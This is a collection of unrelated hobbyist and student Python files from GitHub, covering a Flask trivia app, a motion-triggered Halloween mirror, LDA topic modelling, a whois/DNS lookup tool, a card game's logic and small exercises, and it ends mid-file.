redirect, render_template, request, session, url_for\nfrom flask_session import Session\nfrom cs50 import SQL\nfrom passlib.apps import custom_app_context as pwd_context\nfrom tempfile import mkdtemp\n\n\n\n# configure CS50 Library to use SQLite database\ndb = SQL(\"sqlite:///finance.db\")\n\ndef apology(message, code=400):\n \"\"\"Renders message as an apology to user.\"\"\"\n def escape(s):\n \"\"\"\n Escape special characters.\n\n https://github.com/jacebrowning/memegen#special-characters\n \"\"\"\n for old, new in [(\"-\", \"--\"), (\" \", \"-\"), (\"_\", \"__\"), (\"?\", \"~q\"),\n (\"%\", \"~p\"), (\"#\", \"~h\"), (\"/\", \"~s\"), (\"\\\"\", \"''\")]:\n s = s.replace(old, new)\n return s\n return render_template(\"apology.html\", top=code, bottom=escape(message)), code\n\ndef succes(message, code=200):\n \"\"\"Renders message as an apology to user.\"\"\"\n def escape(s):\n \"\"\"\n Escape special characters.\n\n https://github.com/jacebrowning/memegen#special-characters\n \"\"\"\n for old, new in [(\"-\", \"--\"), (\" \", \"-\"), (\"_\", \"__\"), (\"?\", \"~q\"),\n (\"%\", \"~p\"), (\"#\", \"~h\"), (\"/\", \"~s\"), (\"\\\"\", \"''\")]:\n s = s.replace(old, new)\n return s\n return render_template(\"succes.html\", top=code, bottom=escape(message)), code\n\n\ndef login_required(f):\n \"\"\"\n Decorate routes to require login.\n\n http://flask.pocoo.org/docs/0.12/patterns/viewdecorators/\n \"\"\"\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if session.get(\"user_id\") is None:\n return redirect(\"/login\")\n return f(*args, **kwargs)\n return decorated_function\n\ndef score(answer):\n \"\"\"Adds points for correct answer\"\"\"\n # select table\n portfolio = db.execute(\"SELECT * FROM portfolio WHERE id = :id\", id=session[\"user_id\"])\n\n # check if answer is correct\n user_answer = answer\n real_answer = portfolio[-1][\"answer\"]\n if user_answer == real_answer:\n db.execute(\"UPDATE score set total_score=total_score+1 WHERE id=:id\", \\\n id=session[\"user_id\"])\n db.execute(\"UPDATE score set session_score=session_score+1 WHERE id=:id\", \\\n id=session[\"user_id\"])\n\ndef qinit():\n \"\"\"Initializes all but the first question\"\"\"\n # select 
table\n portfolio = db.execute(\"SELECT * FROM portfolio WHERE id = :id\", id=session[\"user_id\"])\n\n # setup question config\n cat = portfolio[-1][\"category\"]\n dif = portfolio[-1][\"difficulty\"]\n questiontype = portfolio[-1][\"qtype\"]\n qnumber = int(portfolio[-1][\"qnumber\"]) - 1\n config = [cat, dif, questiontype, qnumber]\n return (config)\n\ndef outofq():\n \"\"\"Checks if out of questions\"\"\"\n\n # delete session from portfolio and return total score\n delete_portfolio = db.execute(\"DELETE FROM portfolio WHERE id = :id\", id=session[\"user_id\"])\n u_score = db.execute(\"SELECT total_score FROM score WHERE id = :id\", id=session[\"user_id\"])\n s_score = db.execute(\"SELECT session_score FROM score WHERE id = :id\", id=session[\"user_id\"])\n return [u_score, s_score]\n\ndef sconfigmulti(answers, cat, questiontype, dif, qnumber, correct_answer):\n # insert data into portfolio for respective questiontypes\n asked = db.execute(\"INSERT INTO portfolio (id, answer, category, qtype, difficulty, qnumber) \\\n VALUES(:id, :answers, :category, :qtype, :difficulty, :qnumber)\", \\\n answers = correct_answer, category = cat, qtype = questiontype, \\\n difficulty = dif, qnumber = qnumber, id=session[\"user_id\"])\n\ndef sconfigtf(answers, cat, questiontype, dif, qnumber, correct_answer):\n # insert data into portfolio for respective questiontypes\n asked = db.execute(\"INSERT INTO portfolio (id, answer, category, qtype, difficulty, qnumber) \\\n VALUES(:id, :answers, :category, :qtype, :difficulty, :qnumber)\", \\\n answers = correct_answer, category = cat, qtype =questiontype, \\\n difficulty = dif, qnumber = qnumber, id=session[\"user_id\"] )\n\ndef delsession():\n # delete session from portfolio\n db.execute(\"DELETE FROM portfolio WHERE id = :id\", id=session[\"user_id\"])\n\ndef session_score():\n # set user id into score table\n score = db.execute(\"INSERT INTO score (id) VALUES (:id)\", id=session[\"user_id\"])\n\ndef q_score():\n # return session score\n score = db.execute(\"SELECT session_score FROM score WHERE id = :id\", id=session[\"user_id\"])\n return score[0][\"session_score\"]\n\ndef reset_score():\n # reset session score\n db.execute(\"UPDATE score set session_score=0 WHERE id=:id\", \\\n id=session[\"user_id\"])\n\ndef leaders():\n # lookup top 5 scores\n one = db.execute(\"SELECT * FROM score ORDER BY total_score DESC LIMIT 0, 5\")\n two = db.execute(\"SELECT * FROM score ORDER BY total_score DESC LIMIT 0, 5\")\n three = db.execute(\"SELECT * FROM score ORDER BY total_score DESC LIMIT 0, 5\")\n four = db.execute(\"SELECT * FROM score ORDER BY total_score DESC LIMIT 0, 5\")\n five = db.execute(\"SELECT * FROM score ORDER BY total_score DESC LIMIT 0, 5\")\n\n return [one, two, three, four, five]\n\ndef leader_names(top):\n # set id's of top 5 scores\n row_1 = top[1][0][\"id\"]\n row_2 = top[1][1][\"id\"]\n row_3 = top[1][2][\"id\"]\n row_4 = top[1][3][\"id\"]\n row_5 = top[1][4][\"id\"]\n\n # lookup names associated with top 5 scores\n name_1 = db.execute(\"SELECT username FROM users WHERE id = :id\", id=row_1)\n name_2 = db.execute(\"SELECT username FROM users WHERE id = :id\", id=row_2)\n name_3 = db.execute(\"SELECT username FROM users WHERE id = :id\", id=row_3)\n name_4 = db.execute(\"SELECT username FROM users WHERE id = :id\", id=row_4)\n name_5 = db.execute(\"SELECT username FROM users WHERE id = :id\", id=row_5)\n\n return [name_1, name_2, name_3, name_4, 
name_5]\n","repo_name":"IIVolumeII/webik-14","sub_path":"trivia/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":6028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31100390432","text":"import os\nimport random\nfrom time import sleep\nfrom gpiozero import MotionSensor\n\n#Clear console and turn off blinking cursor\n#This makes for a completely black screen behind the mirror\nos.system(\"clear\")\nos.system(\"setterm --cursor off\")\n\n#Set motion Sensor GPIO 17\npir = MotionSensor(17)\n\n#path where videos are located\nfolderPath = \"/home/pi/Videos/\"\n\n#List of File Names of Videos in folder\nvideos = [\"BC_FearTheReaper_Holl_V.mp4\",\n          \"BC_GatheringGhouls_Holl_V.mp4\",\n          \"PP_StartleScare1_Wall_Spotlight_V.mp4\",\n          \"PP_StartleScare2_Wall_Spotlight_V.mp4\",\n          \"PP_StartleScare3_Wall_Spotlight_V.mp4\"]\n\n#VLC Command for starting the video with options\n# \"--quiet\" Turn off all messages on the console.\n# \"--no-osd\" No on-screen display (disables title of video from displaying)\n# \"-f\" fullscreen\n# \"--autoscale\" Let the video scale to fit a given window or fullscreen.\n# https://wiki.videolan.org/VLC_command-line_help/\nvlcCommandStart = \"vlc --quiet --no-osd -f --autoscale file://\"\n\n#End of the VLC Command after the file being played.\n# \"vlc://quit\" Close VLC after video is done\n# \">/dev/null 2>&1\" redirect all console output to null\nvlcCommandEnd = \" vlc://quit >/dev/null 2>&1\"\n\ntry:\n    while True: # this will carry on until you hit CTRL+C\n        os.system(\"clear\")\n\n        #Wait for motion sensor\n        pir.wait_for_motion()\n\n        #Give time to look at mirror reflection\n        # wait 3 seconds\n        sleep(3)\n\n        #Get video at random from list\n        video = random.choice(videos)\n        #Create command to play video by concatenating command variables.\n        videoCommand = vlcCommandStart + folderPath + video + vlcCommandEnd\n        #Run VLC command from BASH Shell/Terminal\n        os.system(videoCommand)\n\n        #After video plays let reflection\n        #show before playing another video\n        #wait 3 seconds\n        sleep(3)\n\n        #wait for motion sensor to deactivate\n        #pir.wait_for_no_motion()\n\n# this block will run no matter how the try block exits\nfinally:\n    # clean up after yourself: release the GPIO pin held by the motion sensor\n    pir.close()","repo_name":"andyrblank/HalloweenMirror","sub_path":"mirrorScript.py","file_name":"mirrorScript.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71640823186","text":"import MLfunctions as mlf\r\nimport gensim\r\nfrom gensim import corpora\r\nfrom gensim.models import Doc2Vec,Word2Vec,TfidfModel\r\nfrom gensim.models.doc2vec import TaggedDocument\r\nfrom gensim.utils import simple_preprocess\r\nfrom gensim.models import CoherenceModel\r\nfrom nltk.corpus import stopwords\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport os\r\nimport sys\r\nimport seaborn as sns\r\nimport matplotlib.colors as mcolors\r\n\r\nsw=stopwords.words('spanish')\r\npathtohere=os.getcwd()\r\n\r\n\r\ndef main():\r\n    print('LDA model with gensim')\r\n    print('1) 1 gram, 2) 2 gram, 3) 3 gram, 4) Ranking of coherence')\r\n    op=input()\r\n    op=int(op)\r\n    #28 topics, optimum result (27 topics are really 28, 0 to 27)\r\n    numberTopic=5\r\n    lsReturn=[]\r\n    lsDocuments=[]\r\n    lsSubject=[]\r\n    #lsNoThesis=[]\r\n    #Get the information into a list of documents\r\n    lsReturn=mlf.getRawTextToList()\r\n
lsDocuments=lsReturn[0]\r\n lsSubject=lsReturn[1]\r\n #lsNoThesis=lsReturn[2]\r\n #Read the unwanted words and then add them up to stopwords\r\n lsUnWantedWords=[]\r\n lsUnWantedWords=mlf.readFile('removed_words.txt')\r\n for word in lsUnWantedWords:\r\n sw.append(word.strip())\r\n \r\n #Read the Notsure words and then add them up to stopwords\r\n lsNotSureWords=[]\r\n lsNotSureWords=mlf.readFile('notsure_words.txt')\r\n for word in lsNotSureWords:\r\n sw.append(word.strip())\r\n \r\n lsDocuments_NoSW = [[word for word in simple_preprocess(str(doc)) if word not in sw] for doc in lsDocuments]\r\n\r\n\r\n if(op==1):\r\n print('LDA model with gensim for 1 gram')\r\n \r\n if(op==2):\r\n print('LDA model with gensim for 2 gram')\r\n bigram = gensim.models.Phrases(lsDocuments_NoSW, min_count=5, threshold=100)\r\n bigram_mod = gensim.models.phrases.Phraser(bigram)\r\n lsDocBiGram = [bigram_mod[doc] for doc in lsDocuments_NoSW]\r\n lsDocuments_NoSW.clear()\r\n lsDocuments_NoSW = [[word for word in simple_preprocess(str(doc)) if word not in sw] for doc in lsDocBiGram]\r\n \r\n\r\n if(op==3):\r\n print('LDA model with gensim for 3 gram')\r\n bigram = gensim.models.Phrases(lsDocuments_NoSW, min_count=5, threshold=100)\r\n bigram_mod = gensim.models.phrases.Phraser(bigram)\r\n trigram = gensim.models.Phrases(bigram[lsDocuments_NoSW], threshold=100)\r\n trigram_mod = gensim.models.phrases.Phraser(trigram)\r\n lsDocTrigram = [trigram_mod[doc] for doc in lsDocuments_NoSW]\r\n lsDocuments_NoSW.clear()\r\n lsDocuments_NoSW = [[word for word in simple_preprocess(str(doc)) if word not in sw] for doc in lsDocTrigram]\r\n \r\n \"\"\"\r\n print('Getting bigrams list...')\r\n for doc in lsDocuments_NoSW:\r\n for word in doc:\r\n mlf.appendInfoToFile(pathtohere,'\\\\trigrams.txt',word+'\\n')\r\n\r\n \"\"\" \r\n\r\n if (op==4):\r\n print('Starting coherence ranking with 2 gram...') \r\n #Generate best coherence ranking\r\n # Create Dictionary\r\n id2word = corpora.Dictionary(lsDocuments_NoSW)\r\n # Create Corpus: Term Document Frequency\r\n corpus = [id2word.doc2bow(text) for text in lsDocuments_NoSW]\r\n bigram = gensim.models.Phrases(lsDocuments_NoSW, min_count=5, threshold=100)\r\n bigram_mod = gensim.models.phrases.Phraser(bigram)\r\n lsDocBiGram = [bigram_mod[doc] for doc in lsDocuments_NoSW]\r\n lsDocuments_NoSW.clear()\r\n lsDocuments_NoSW = [[word for word in simple_preprocess(str(doc)) if word not in sw] for doc in lsDocBiGram]\r\n limit=51; start=2; step=1;\r\n model_list, coherence_values = mlf.compute_coherence_values(dictionary=id2word, corpus=corpus, texts=lsDocuments_NoSW, start=start, limit=limit, step=step)\r\n print('Plotting ranking...')\r\n # Show graph\r\n \r\n x = range(start, limit, step)\r\n plt.plot(x, coherence_values)\r\n plt.xlabel(\"Num Topics\")\r\n plt.ylabel(\"Coherence score\")\r\n plt.legend((\"coherence_values\"), loc='best')\r\n plt.show() \r\n sys.exit()\r\n\r\n # id2word :Create Dictionary, this dictionary has the id and word\r\n \r\n id2word = corpora.Dictionary(lsDocuments_NoSW)\r\n\r\n # Term Document Frequency\r\n #Gensim creates a unique id for each word in the document. 
\r\n    #The produced corpus shown above is a mapping of (word_id, word_frequency).\r\n\r\n    corpus = [id2word.doc2bow(text) for text in lsDocuments_NoSW]\r\n    #Example: it has 37,342 indexes, so 0 to 37,341\r\n    columns=len(id2word)\r\n    #Generate list of columns\r\n    lsColumn=[]\r\n    for i in range(0,columns):\r\n        lsColumn.append(str(i))\r\n    #Generate the indexes (id_thesis)\r\n    lsIndex=[]\r\n    lsIndex=mlf.readFile('lsThesis.txt')\r\n    term_matrix=[]\r\n    lim=columns-1\r\n    countDoc=0\r\n    for doc in corpus:\r\n        strdoc=''\r\n        for i in range(0,columns):\r\n            bFound=False\r\n            for index_word,value in doc:\r\n                #Case: When the document has that index word\r\n                if int(i)!=lim:\r\n                    if i==index_word:\r\n                        bFound=True\r\n                        if i==0:\r\n                            strdoc='('\r\n                        if int(index_word)==i:\r\n                            strdoc=strdoc+str(value)+','\r\n                        break\r\n                #Case: End of columns then add value and ')'\r\n                else:\r\n                    if i==index_word:\r\n                        bFound=True\r\n                        if int(index_word)==i:\r\n                            strdoc=strdoc+str(value)+')'\r\n                        break\r\n            if bFound==False:\r\n                strdoc=strdoc+'0,'\r\n            if bFound==False and i==lim:\r\n                strdoc=strdoc+'0)'\r\n\r\n        #mlf.appendInfoToFile(pathtohere+'\\\\','vectors.txt',strdoc)\r\n        term_matrix.append(strdoc)\r\n        countDoc=countDoc+1\r\n        print('Doc:',str(countDoc))\r\n\r\n\r\n    dataFrame = pd.DataFrame(term_matrix)\r\n    for row in dataFrame.iterrows():\r\n        mlf.appendInfoToFile(pathtohere+'\\\\','dataFrameContent.txt',str(row))\r\n\r\n    sys.exit()\r\n\r\n    #Print the id and word\r\n    \"\"\"\r\n    for element in lsSubject:\r\n        mlf.appendInfoToFile(pathtohere+'\\\\','lsSubject.txt',str(element)+'\\n')\r\n\r\n    #Get the word and its ID.\r\n    for key,value in id2word.token2id.items():\r\n        mlf.appendInfoToFile(pathtohere+'\\\\','id2word.txt',str(key)+';'+str(value)+'\\n')\r\n\r\n    \"\"\"\r\n\r\n    print('LDA Model starting...')\r\n    # Build LDA model\r\n    lda_model = gensim.models.ldamodel.LdaModel(corpus=corpus,\r\n                                                id2word=id2word,\r\n                                                num_topics=numberTopic)\r\n\r\n    \"\"\"\r\n    print('Printing topics')\r\n    lda_topics=lda_model.print_topics()\r\n    for topic in lda_topics:\r\n        mlf.appendInfoToFile(pathtohere,'\\\\list_of_topics_lda.txt',str(topic)+'\\n')\r\n    \"\"\"\r\n\r\n    df=pd.DataFrame()\r\n    df=mlf.getDominantTopicDataFrame(lda_model,corpus,lsDocuments_NoSW,lsSubject)\r\n    mlf.generateFileSeparatedBySemicolon(df,str(op)+'gram_csv_'+str(numberTopic)+'_withoutCompleteList.txt')\r\n\r\n    mlf.generatePyLDAVis(lda_model,corpus,'vis_'+str(op)+'gram_'+str(numberTopic)+'_withoutCompleteList.html')\r\n\r\n    \"\"\"\r\n    lda_cm=CoherenceModel(model=lda_model,corpus=corpus,dictionary=id2word,texts=lsDocuments_NoSW)\r\n    print('LDA Coherence:',lda_cm.get_coherence())\r\n    \"\"\"\r\n\r\n\r\nif __name__=='__main__':\r\n    main()\r\n","repo_name":"ulysesrico33/appPythonML","sub_path":"topicModeling_gensim_LDA.py","file_name":"topicModeling_gensim_LDA.py","file_ext":"py","file_size_in_byte":7663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30858742349","text":"# Simulate 30 requests\n# sent to http://127.0.0.1:8000/test\n# sent to http://127.0.0.1:8001/test\n\nimport random\nfrom threading import Thread\nimport requests\n\n# randomly send each request to port 8000 or 8001\ndef get_request():\n    url = 'http://127.0.0.1:8000/test'\n    url2 = 'http://127.0.0.1:8001/test'\n    get_url = random.choice([url,url2])\n    res = requests.get(get_url)\n    print('request OK')\n\nt_list = []\n\nfor i in range(30):\n    t = Thread(target=get_request)\n    t_list.append(t)\n    t.start()\n    print(i)\n\nfor t in t_list:\n
t.join()\n\n\n","repo_name":"tomcatcn/wiki","sub_path":"tools/test_lock.py","file_name":"test_lock.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71092651987","text":"# Tocando um arquivo mp3.\n\n# Import the modules\n\nimport pygame\nfrom pygame import mixer\n\n# Instancia mixer\nmixer.init()\n\n# Carrega um arquivo de música\nmixer.music.load('ex021.mp3')\n\n# Dá um play na música\nmixer.music.play()\nprint(\"Tocando a música...\")\n\nwhile True:\n print(\"-----------------------------------------------\")\n print(\"Pressione P para Pausar.\")\n print(\"Pressione R para dar Play.\")\n print(\"Pressione E para sair.\")\n\n userInput = input(\" \")\n\n if userInput == 'p':\n\n mixer.music.pause()\n print('Música pausada.')\n elif userInput == 'r':\n mixer.music.unpause()\n print(\"Música está tocando.\")\n elif userInput == 'e':\n print(\"Você saiu do player\")\n break\n","repo_name":"GabrielVictorino8266/python","sub_path":"cursoemvideo/Mundo1/exercises/ex021.py","file_name":"ex021.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15531369915","text":"import whois\nimport logging\nimport json\nimport dns.resolver\n\nunique_domains = ['youtu.be']\n\n\ndef get_nslookup(domain):\n\n # records = ['A', 'AAAA', 'CNAME', 'MX', 'NS', 'SOA', 'TXT']\n records = {\n 'A': [],\n 'AAAA': [],\n 'CNAME': [],\n 'MX': [],\n 'NS': [],\n 'SOA': [],\n 'TXT': []\n }\n for record in records.keys():\n try:\n nslookup = dns.resolver.query(domain, record)\n # print('nslookup:', nslookup)\n for server in nslookup:\n # print(record + ': ' + str(server))\n records[record].append(str(server))\n except Exception as e:\n print(e)\n # submitError(link=link)\n logging.info(\"NS Lookup fetched... ✅\")\n print(\"NS Lookup: \" + json.dumps(records, indent=4, sort_keys=True))\n return records\n\n\ndef getWhois(parsed_url):\n try:\n whois_data = whois.whois(parsed_url['domain'])\n\n if ('domain_name' in whois_data.keys()):\n domain_name = whois_data['domain_name'][0] if type(\n whois_data['domain_name']) is list else whois_data['domain_name']\n\n else:\n if (parsed_url['domain'] in unique_domains):\n domain_name = parsed_url['domain']\n else:\n # print('domain_name not found')\n logging.error(\"domain_name not found... 
👻\")\n\n                return\n\n        # convert domain_name to lowercase\n        domain_name = domain_name.lower()\n\n        # print('domain_name: ', domain_name)\n\n        if ('registrar' in whois_data.keys()):\n            registrar = whois_data['registrar']\n        else:\n            registrar = None\n\n        whoisServer = whois_data['whois_server'] if 'whois_server' in whois_data.keys(\n        ) else None\n\n        if 'updated_date' in whois_data.keys():\n            updatedDate = whois_data['updated_date'] if type(\n                whois_data['updated_date']) is list else [whois_data['updated_date']]\n        else:\n            updatedDate = None\n\n        if 'creation_date' in whois_data.keys():\n            creationDate = whois_data['creation_date'][0] if type(\n                whois_data['creation_date']) is list else whois_data['creation_date']\n        else:\n            creationDate = None\n\n        if 'expiration_date' in whois_data.keys():\n            expirationDate = whois_data['expiration_date'][0] if type(\n                whois_data['expiration_date']) is list else whois_data['expiration_date']\n        else:\n            expirationDate = None\n\n        if 'name_servers' in whois_data.keys():\n            nameServers = whois_data['name_servers']\n        else:\n            nameServers = None\n\n        if 'status' in whois_data.keys():\n            status = whois_data['status'] if type(whois_data['status']) is list else [\n                whois_data['status']]\n        else:\n            status = None\n\n        if 'emails' in whois_data.keys():\n            emails = whois_data['emails'] if type(whois_data['emails']) is list else [\n                whois_data['emails']]\n        else:\n            emails = None\n\n        if 'dnssec' in whois_data.keys():\n            dnssec = whois_data['dnssec'] if type(whois_data['dnssec']) is list else [\n                whois_data['dnssec']]\n        else:\n            dnssec = None\n\n        if 'name' in whois_data.keys():\n            name = whois_data['name'] if whois_data['name'] else None\n        else:\n            name = None\n\n        if 'org' in whois_data.keys():\n            org = whois_data['org'] if whois_data['org'] else None\n        else:\n            org = None\n\n        if 'address' in whois_data.keys():\n            address = whois_data['address'] if whois_data['address'] else None\n        else:\n            address = None\n\n        if 'city' in whois_data.keys():\n            city = whois_data['city'] if whois_data['city'] else None\n        else:\n            city = None\n\n        if 'country' in whois_data.keys():\n            country = whois_data['country'] if whois_data['country'] else None\n        else:\n            country = None\n\n        if 'state' in whois_data.keys():\n            state = whois_data['state'] if whois_data['state'] else None\n        else:\n            state = None\n\n        if 'address' in whois_data.keys():\n            address = address if type(address) is list else [address]\n        else:\n            address = None\n\n        if address and address[0] is None:\n            address = None\n        if updatedDate and updatedDate[0] is None:\n            updatedDate = None\n        if status and status[0] is None:\n            status = None\n        if emails and emails[0] is None:\n            emails = None\n        if dnssec and dnssec[0] is None:\n            dnssec = None\n\n        logging.info(\"whois data collected... 
📝\")\n\n print(\n 'domain:', domain_name,\n '\\nregistrar:', registrar,\n '\\nwhoisServer:', whoisServer,\n '\\nupdatedDate:', updatedDate,\n '\\ncreationDate:', creationDate,\n '\\nexpirationDate:', expirationDate,\n '\\nnameServers:', nameServers,\n '\\nstatus:', status,\n '\\nemails:', emails,\n '\\ndnssec:', dnssec,\n '\\nname:', name,\n '\\norg:', org,\n '\\naddress:', address,\n '\\ncity:', city,\n '\\ncountry:', country,\n '\\nstate:', state\n )\n\n except Exception as e:\n print(e)\n # submitError(link=link)\n\n\nif __name__ == '__main__':\n getWhois({'domain': 'google.com'})\n get_nslookup('google.com')\n","repo_name":"Amansinghtech/python-whois","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"9104975971","text":"class Solution(object):\n def change(self, amount, coins):\n \"\"\"\n :type amount: int\n :type coins: List[int]\n :rtype: int\n \"\"\"\n change = [0] * (amount+1)\n change[0] = 1 # can always make 0 change\n for c in coins:\n for i in range(c,amount+1):\n change[i] = change[i] + change[i-c]\n return change[amount]","repo_name":"BlakeBrown/LeetCode-Solutions","sub_path":"518 - Coin Change 2.py","file_name":"518 - Coin Change 2.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"48"} +{"seq_id":"1986974977","text":"import random\nfrom collections import defaultdict\nfrom PyQt6.QtWidgets import QLabel\nfrom backend.player import player\n\n\nclass Game:\n def __init__(self):\n self.deck = [\n f\"{i}{j}\"\n for i in list(\"KQJA\") + list(map(str, range(2, 11)))\n for j in \"SHCD\"\n ] * 2\n\n self.board = [\n [\"XX\", \"6D\", \"7D\", \"8D\", \"9D\", \"10D\", \"QD\", \"KD\", \"AD\", \"XX\"],\n [\"5D\", \"3H\", \"2H\", \"2S\", \"3S\", \"4S\", \"5S\", \"6S\", \"7S\", \"AC\"],\n [\"4D\", \"4H\", \"KD\", \"AD\", \"AC\", \"KC\", \"QC\", \"10C\", \"8S\", \"KC\"],\n [\"3D\", \"5H\", \"QD\", \"QH\", \"10H\", \"9H\", \"8H\", \"9C\", \"9S\", \"QC\"],\n [\"2D\", \"6H\", \"10D\", \"KH\", \"3H\", \"2H\", \"7H\", \"8C\", \"10S\", \"10C\"],\n [\"AS\", \"7H\", \"9D\", \"AH\", \"4H\", \"5H\", \"6H\", \"7C\", \"QS\", \"9C\"],\n [\"KS\", \"8H\", \"8D\", \"2C\", \"3C\", \"4C\", \"5C\", \"6C\", \"KS\", \"8C\"],\n [\"QS\", \"9H\", \"7D\", \"6D\", \"6D\", \"4D\", \"QD\", \"2D\", \"AS\", \"7C\"],\n [\"10S\", \"10H\", \"QH\", \"KH\", \"AH\", \"2C\", \"3C\", \"4C\", \"5C\", \"6C\"],\n [\"XX\", \"9S\", \"8S\", \"7S\", \"6S\", \"5S\", \"4S\", \"3S\", \"2S\", \"XX\"],\n ]\n\n random.shuffle(self.deck)\n self.pos = defaultdict(list)\n self.used = defaultdict(int)\n self.coins = defaultdict(QLabel)\n self.filled = [[0] * 10 for _ in \" \" * 10]\n self.winner = False\n\n def storeLocations(self):\n for i in range(10):\n for j in range(10):\n self.pos[self.board[i][j]] += ((i, j),)\n\n def distribute(self, player: player):\n for _ in range(5):\n player.addCard(self.getNewCard())\n\n def getNewCard(self):\n while self.deck:\n newCard = self.deck.pop()\n if not self.used[newCard] == 2:\n self.used[newCard] += 1\n return newCard\n return False\n\n def checkSequence(self, x, y, obj):\n # check up - down\n\n total = 0\n b = d = y\n while b >= 0:\n if obj.playerBox[x][b]:\n total += 1\n else:\n break\n b -= 1\n\n while d < 10:\n if obj.playerBox[x][d]:\n total += 1\n else:\n break\n d += 1\n\n obj.playerScore += total >= 6\n\n # check left - right\n\n total = 0\n a = c = x\n while a:\n 
if obj.playerBox[a][y]:\n total += 1\n else:\n break\n a -= 1\n\n while c < 10:\n if obj.playerBox[c][y]:\n total += 1\n else:\n break\n c += 1\n\n obj.playerScore += total >= 6\n\n # check left - diagonal\n\n total = 0\n a = c = x\n b = d = y\n while a and b:\n if obj.playerBox[a][b]:\n total += 1\n else:\n break\n a -= 1\n b -= 1\n\n while c < 10 and d < 10:\n if obj.playerBox[c][d]:\n total += 1\n else:\n break\n c += 1\n d += 1\n\n obj.playerScore += total >= 6\n\n # check right - diagonal\n\n total = 0\n a = c = x\n b = d = y\n while a and b < 9:\n if obj.playerBox[a][b]:\n total += 1\n else:\n break\n a -= 1\n b += 1\n\n while c < 9 and d:\n if obj.playerBox[c][d] == obj.playerBox[c + 1][d - 1]:\n total += 1\n else:\n break\n c += 1\n d -= 1\n\n obj.playerScore += total >= 6\n if obj.playerScore > 0:\n self.winner = True\n\n def setBox(self, player: player, opponent, x, y):\n if self.board[x][y] == \"XX\":\n return False\n\n ok = player.hasChosenValid(x, y, opponent, self.board[x][y])\n if ok == 0:\n print(\"NOT VALID\", self.board[x][y], player.playerCards)\n\n elif ok == 1:\n player.playerBox[x][y] = 1\n self.checkSequence(x, y, player)\n self.filled[x][y] = 1\n return ok\n\n else:\n self.filled[x][y] = 0\n opponent[x][y] = 0\n\n return ok\n\n def makeRandomMove(self, player: player, opponent: player):\n while True:\n card = random.choice(player.playerCards) # one eye jack\n if card in (\"JH\", \"JS\"):\n for i in range(10):\n for j in range(10):\n if self.board[i][j] == \"XX\":\n continue\n if opponent.playerBox[i][j]:\n opponent.playerBox[i][j] = 0\n player.playerCards.remove(card)\n self.filled[i][j] = 0\n player.addCard(self.getNewCard())\n return (i, j, 0)\n return False\n\n elif card in (\"JD\", \"JC\"): # two eye jack\n for i in range(10):\n for j in range(10):\n if self.board[i][j] == \"XX\":\n continue\n if (\n player.playerBox[i][j] == 0\n and opponent.playerBox[i][j] == 0\n ):\n player.playerBox[i][j] = 1\n self.filled[i][j] = 1\n self.checkSequence(i, j, player)\n player.playerCards.remove(card)\n player.addCard(self.getNewCard())\n return (i, j, 1)\n return False\n\n else: # normal card\n for i in range(10):\n for j in range(10):\n if self.board[i][j] == \"XX\":\n continue\n if (\n self.board[i][j] == card\n and player.playerBox[i][j] == opponent.playerBox[i][j] == 0\n ):\n self.filled[i][j] = 1\n player.playerBox[i][j] = 1\n self.checkSequence(i, j, player)\n player.playerCards.remove(card)\n player.addCard(self.getNewCard())\n return (i, j, 1)\n\n player.playerCards.remove(card)\n player.addCard(self.getNewCard())\n return False\n","repo_name":"heksadecimal/sequence","sub_path":"src/backend/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"7716174783","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructType, StructField, IntegerType, StringType\n\n\"\"\"\n Dataframe from array\n\"\"\"\n\n__all__ = [\"smartphones_dataframe\"]\n\n\ndef smartphones_dataframe(spark: SparkSession):\n data_array = [[\"Apple\", \"iPhone X\", \"IOS\", 46], [\"Xiaomi\", \"Mi 9\", \"Android\", 54]]\n schema = StructType([StructField('make', StringType(), True),\n StructField('model', StringType(), True),\n StructField('platform', StringType(), True),\n StructField('camera_megapixels', IntegerType(), True)])\n df_from_array = spark.createDataFrame(data_array, schema)\n print(\"Smartphone DataFrame: \")\n df_from_array.show(5)\n\n 
return df_from_array\n","repo_name":"thaapontes/pyspark-etl","sub_path":"ingested_dataframes/smartphones_df.py","file_name":"smartphones_df.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31593026269","text":"##To run the code type in terminal: python3 180123057_MOHAMMAD_HUMAM_KHAN.py\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\nfrom matplotlib import cm\nfrom scipy.stats import multivariate_normal\nimport random\nimport math\nimport numpy as np\nimport statistics\n\n\n\n\n\n#Function to calculate Normal density at a point x (sigma is the standard deviation)\ndef normal_density(mu, sigma, x):\n\ty = (1/(sigma * math.sqrt(2 * math.pi))) * math.exp(-0.5 * ((x-mu)/sigma)**2)\n\treturn y\n\n\n\n#Calculating Frequencies for different intervals\ndef calculate_frequency(results, intervals, freq, sigma,rounds):\n\tfor i in results:\n\t\tfor j in range(len(intervals)):\n\t\t\tif (i <= intervals[j]):\n\t\t\t\tfreq[j] = freq[j] + 1\n\t\t\t\tbreak\n\t#scale counts by bin width (0.2) times sample size so the histogram estimates the density\n\tfor i in range(len(intervals)):\n\t\tfreq[i] = freq[i]/(2*rounds/10)\n\n\n\n##Plotting the results\ndef 